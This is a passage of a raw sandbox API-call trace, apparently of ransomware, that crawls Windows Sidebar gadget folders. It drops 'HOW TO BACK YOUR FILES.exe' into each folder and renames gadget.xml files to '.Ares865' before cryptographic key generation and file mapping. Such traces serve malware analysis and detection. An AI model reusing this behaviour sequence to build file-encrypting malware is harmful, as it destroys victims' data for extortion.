Sidebar\\Gadgets\\MediaCenter.Gadget\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1afe884, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x56754b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56754b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.994] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.994] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.995] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js" [0061.995] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js" [0061.995] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.995] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\js\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.998] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.998] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1cc85b8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x56754b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56754b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.999] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.999] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.999] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images" [0061.999] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images" [0061.999] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.999] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.004] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.004] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x56754b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56754b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.004] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.004] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.005] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US" [0062.005] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US" [0062.005] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.005] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.009] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.009] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5677ace0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5677ace0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.009] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.009] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.009] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml.Ares865") returned 84 [0062.009] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0062.010] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0062.011] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1244) returned 1 [0062.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0062.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0062.011] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0062.012] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.012] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0062.012] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x118 [0062.014] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0062.015] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0062.016] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.016] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0062.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0062.016] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css" [0062.016] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css" [0062.016] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.017] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.020] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.020] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b24af3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5677ace0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5677ace0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.020] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.021] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.021] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget" [0062.021] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget" [0062.021] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.021] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.026] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.026] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x567a0e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x567a0e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.026] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.026] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.027] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images" [0062.027] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images" [0062.027] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.027] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.032] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.032] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x567a0e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x567a0e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.032] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.032] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.033] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US" [0062.033] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US" [0062.033] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.033] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.037] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.037] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x567a0e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x567a0e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.037] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.037] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.037] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml.Ares865") returned 81 [0062.037] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0062.037] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0062.038] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1958) returned 1 [0062.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0062.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.042] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.042] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.042] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.042] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xab0, lpName=0x0) returned 0x118 [0062.044] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xab0) returned 0x190000 [0062.075] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.076] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.076] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0062.076] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js" [0062.076] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js" [0062.076] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.076] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.082] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.082] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56813260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56813260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.083] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.083] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.083] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css" [0062.083] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css" [0062.083] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.083] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\css\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.089] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.089] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x568393c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x568393c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.089] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.089] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.089] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget" [0062.089] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget" [0062.089] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.089] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.096] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.096] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x568393c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x568393c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.097] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.097] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.097] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows 